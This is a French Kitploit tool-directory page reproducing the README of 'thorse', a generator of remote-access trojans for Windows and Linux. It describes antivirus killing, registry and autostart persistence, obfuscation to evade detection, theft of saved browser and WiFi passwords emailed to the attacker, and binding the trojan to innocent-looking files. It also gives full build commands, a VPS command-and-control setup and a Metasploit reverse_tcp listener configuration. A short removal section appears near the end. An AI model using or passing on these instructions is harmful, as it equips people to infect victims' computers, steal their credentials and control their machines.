Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
thorse — THorse est un générateur de RAT (Remote Administrator Trojan) pour les systèmes Windows/Linux écrit en Python 3. | Kitploit
Outils/GitHubGitHub/pushpenderindia/thorse
Cassage de Mots de PasseFrameworks d'ExploitationGénération de PayloadsMécanismes de PersistanceÉvasion IDS/IPSPost-ExploitationCommandement et ContrôleCheval de Troie d'Accès à DistanceAnti-Bot
GitHubpushpenderindia/thorse

thorse

THorse est un générateur de RAT (Remote Administrator Trojan) pour les systèmes Windows/Linux écrit en Python 3.

61412651il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

THorse

THorse est un générateur de RAT (Remote Administrator Trojan) pour systèmes Windows/Linux écrit en Python 3.

root@kitploit:~
                    Ce petit script Python peut faire un travail vraiment impressionnant.

Avertissement

:computer: Ce projet a été créé uniquement pour de bonnes fins et une utilisation personnelle.

CE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE. VOUS POUVEZ UTILISER CE LOGICIEL À VOS PROPRES RISQUES. L'UTILISATION RELÈVE DE L'ENTIÈRE RESPONSABILITÉ DE L'UTILISATEUR FINAL. LES DÉVELOPPEURS DÉCLINENT TOUTE RESPONSABILITÉ ET NE SONT PAS RESPONSABLES DE TOUT USAGE ABUSIF OU DOMMAGE CAUSÉ PAR CE PROGRAMME.

Fonctionnalités

  • Fonctionne sous Windows/Linux
  • Notifie une nouvelle victime par e-mail
  • Indétectable
  • Ne nécessite pas de privilèges root ou administrateur
  • Persistance
  • Envoie une capture d'écran de l'écran du PC victime par e-mail
  • Donne un accès complet Meterpreter à l'attaquant
  • Ne nécessite jamais d'installation de Metasploit pour créer le cheval de Troie
  • Crée un binaire exécutable sans aucune dépendance
  • Crée une charge utile de taille réduite (~5 Mo) avec des fonctionnalités avancées
  • Obfusque la charge utile avant de la compiler, contournant ainsi quelques antivirus supplémentaires
  • La charge utile générée est encodée en Base64, ce qui rend l'ingénierie inverse extrêmement difficile
  • Tue l'antivirus sur le PC victime et tente de désactiver le Centre de sécurité Windows
  • Interface colorée géniale pour générer la charge utile
Récupérations prises en charge, essaie de récupérer les mots de passe enregistrés depuis :
Navigateur Chrome
WiFi

Note : Le voleur (stealer) personnalisé est codé, il ne dépend pas de LaZagne

Testé sur

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Voici les limites de la charge utile meterpreter générée avec Metasploit :-

  • Il faut lancer le listener Metasploit avant d'exécuter la backdoor
  • La backdoor ne devient pas persistante d'elle-même ; nous devons utiliser les modules de post-exploitation pour rendre la backdoor persistante. Et les modules de post-exploitation ne peuvent être utilisés qu'après une exploitation réussie.
  • Ne nous notifie pas lorsque la charge utile est exécutée sur un nouveau système.

Nous savons tous à quel point la charge utile Meterpreter est puissante, mais la charge utile qui en est issue n'est pas satisfaisante.

Voici les fonctionnalités de ce générateur de charge utile qui vous donneront une bonne idée de ce script Python :-

  • Utilise le registre Windows pour assurer la persistance sous Windows.
  • Parvient également à assurer la persistance sous Linux.
  • La charge utile peut s'exécuter sous Linux ainsi que sous Windows.
  • Fournit un accès complet, le listener Metasploit peut être utilisé et un listener personnalisé est également pris en charge (vous pouvez créer votre propre listener)
  • Envoie une notification par e-mail, chaque fois que la charge utile s'exécute sur un nouveau système, avec les informations complètes du système.
  • Génère la charge utile en moins d'une minute, voire moins.
  • Prend en charge tous les modules de post-exploitation meterpreter.
  • La charge utile peut être créée aussi bien sous Windows que sous Linux.

Prérequis

  • Python 3.X
  • Quelques modules externes

Veuillez noter :

Sous Windows, veuillez spécifier/définir le chemin de Pyinstaller dans paygen.py [ligne 14]

Le chemin par défaut est le suivant : PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Modifiez-le selon votre système

Comment l'utiliser sous Linux

root@kitploit:~
# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ bash installer_linux.sh

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Comment l'utiliser sur un VPS (recommandé)

root@kitploit:~
# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc

# 2. Connect to your VPS Using SSH
$ ssh username@ip_address

# 3. Update Your Linux VPS
$ sudo apt update

# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. Install gnupg package
$ sudo apt install gnupg

# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. Update VPS
$ sudo apt update

# 8. Set Kali Priority
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. Update VPS
$ sudo apt update

# 10. Install Metasploit Framework in VPS
$ sudo apt install -t kali-rolling metasploit-framework

# NOTE: Above Steps needs to be performed only for once 

# 11. Install pip3
$ sudo apt install python3-pip

# 12. Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# 13. Go into the repository
$ cd thorse

# 14. Installing dependencies
$ bash installer_linux.sh

# 15. If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ 16. chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT (If you want to Compile RAT for Windows, then Build RAT on Windows Machine & Use VPS for Controlling RAT Remotely)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Comment l'utiliser sous Windows

root@kitploit:~
# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open paygen.py in Text editor and Configure Line 15, set Pyinstaller path, Default Path is as follows :-
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe") 

# Getting Help Menu
$ python paygen.py --help

# Making Payload/RAT
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT binded with legitimate file [Any file .exe, .pdf, .txt etc]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Note :- Le fichier malveillant sera enregistré dans le dossier dist/, à l'intérieur du dossier technowhorse/

Établir une connexion avec Msfconsole

  • Vous devez installer Metasploit-Framework sur votre système pour établir la connexion

  • Paramètres recommandés, vous pouvez essayer de tester avec n'importe quelle autre charge utile à la ligne 2

root@kitploit:~
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run

Comment mettre à jour

  • Exécutez updater.py pour mettre à jour automatiquement ou téléchargez le dernier Zip depuis ce dépôt GitHub
  • Note : Git doit être installé pour utiliser updater.py

Arguments disponibles

  • Arguments facultatifs

Note : -w/--windows ou -l/--linux doit être spécifié

  • Arguments requis

Nouvelles captures d'écran :

Obtenir de l'aide

Génération de la charge utile

Consultez également ces anciennes images

~Anciennes captures d'écran :

Obtenir de l'aide

Exécution du script paygen.py

Lorsque le RAT s'exécute, il ajoute une entrée de registre pour assurer la persistance

Se copie lui-même et se sauvegarde dans Roaming

Rapport envoyé par le RAT

Réception d'une notification depuis le PC victime

Contributeurs :

Ce dépôt est actuellement maintenu par moi (Pushpender Singh). Mais si vous souhaitez devenir contributeur, ajoutez une fonctionnalité intéressante et faites une pull request, je la passerai en revue et la fusionnerai dans ce dépôt.

La pull request de chaque contributeur sera acceptée si elle est jugée digne de ce dépôt.

À FAIRE

  • Ajouter de nouvelles fonctionnalités
  • Contribuer avec une interface graphique

Supprimer TechNowHorse sous Windows :

Méthode 1 :

  • Allez dans Démarrer, tapez regedit et exécutez le premier programme, cela ouvrira l'Éditeur du registre.
  • Naviguez jusqu'au chemin suivant Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Il devrait y avoir une entrée nommée winexplorer, cliquez dessus avec le bouton droit et sélectionnez Supprimer.
  • Accédez à votre chemin utilisateur > AppData > Roaming, vous verrez un fichier nommé « explorer.exe », c'est le RAT, cliquez dessus avec le bouton droit > Supprimer.
  • Redémarrez le système.

Méthode 2 :

  • Exécutez « RemoveTHorse.bat » sur le système infecté, puis redémarrez le PC pour arrêter le fichier malveillant actuellement en cours d'exécution.

Supprimer TechNowHorse sous Linux :

  • Ouvrez le fichier Autostart avec n'importe quel éditeur de texte, Chemin du fichier Autostart : ~/.config/autostart/xinput.desktop

  • Supprimez ces 5 lignes :

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Note : destination_file_name est le nom du fichier malveillant que vous avez donné à votre cheval de Troie via le paramètre -o

  • Redémarrez votre système, puis supprimez le fichier malveillant enregistré dans le chemin ci-dessous

  • Chemin de destination où TrojanHorse est stocké : ~/.config/xnput

Contributeurs

  • Liste des contributeurs dédiés : Contributeurs

Pushpender Singh

:computer:

Toutes sortes de contributions sont les bienvenues !

NOTE : Si vous devriez figurer sur la liste des contributeurs mais que nous vous avons oublié, faites-le-nous savoir !

Liste des tâches à faire

  • Suggérez votre propre fonctionnalité : )
  • Développement d'une interface graphique (GUI)
  • Correction de bugs
  • Ajouter davantage de voleurs de mots de passe de navigateur
Télécharger l’outil
  • Côté attaquant : lors de la création de la charge utile, le script détecte automatiquement les dépendances manquantes et les installe
  • Permet d'ajouter une icône personnalisée au fichier malveillant
  • Binder intégré qui peut lier un exécutable à n'importe quel fichier [.pdf, .txt, .exe, etc.], exécutant le fichier légitime au premier plan et les codes malveillants en arrière-plan en tant que service.
  • Vérifie si une instance est déjà en cours d'exécution sur le système ; si une instance en cours est trouvée, seul le fichier légitime est exécuté [Interdiction des instances multiples].
  • L'attaquant peut créer/compiler pour Windows/Linux à partir d'un système Linux, mais ne peut créer/compiler qu'un exécutable Windows à partir d'une machine Windows
  • Récupère les mots de passe enregistrés du système victime et les envoie à l'attaquant.
  • RaccourciNom completDescription
    -h--helpafficher ce message d'aide et quitter
    -k KILL_AV--kill_av KILL_AVAntivirusKiller : spécifiez l'exécutable .exe de l'antivirus à tuer. Ex : --kill_av cmd.exe
    -t TIME_IN_SECONDS--persistence TIME_PERSISTENTDevenir persistant après __ secondes. défaut=10
    -w--windowsGénérer un exécutable Windows.
    -l--linuxGénérer un exécutable Linux.
    -b file.txt--bind LEGITIMATE_FILE_PATH.pdfAutoBinder : spécifiez le chemin du fichier légitime. [Système d'exploitation pris en charge : Windows]
    -s--steal-passwordVoler les mots de passe enregistrés de la machine victime [Système d'exploitation pris en charge : Windows]
    -d--debugExécuter le virus au premier plan
    RaccourciNom completDescription
    --icon ICONSpécifiez le chemin de l'icône, icône du fichier malveillant [Note : doit être au format .ico]
    --ip IP_ADDRESSAdresse e-mail à laquelle envoyer les rapports.
    --port PORTPort de l'adresse IP fournie dans l'argument --ip.
    -e EMAIL--email EMAILAdresse e-mail à laquelle envoyer les rapports.
    -p PASSWORD--password PASSWORDMot de passe de l'adresse e-mail fournie dans l'argument -e.
    -o OUT--out OUTNom du fichier de sortie.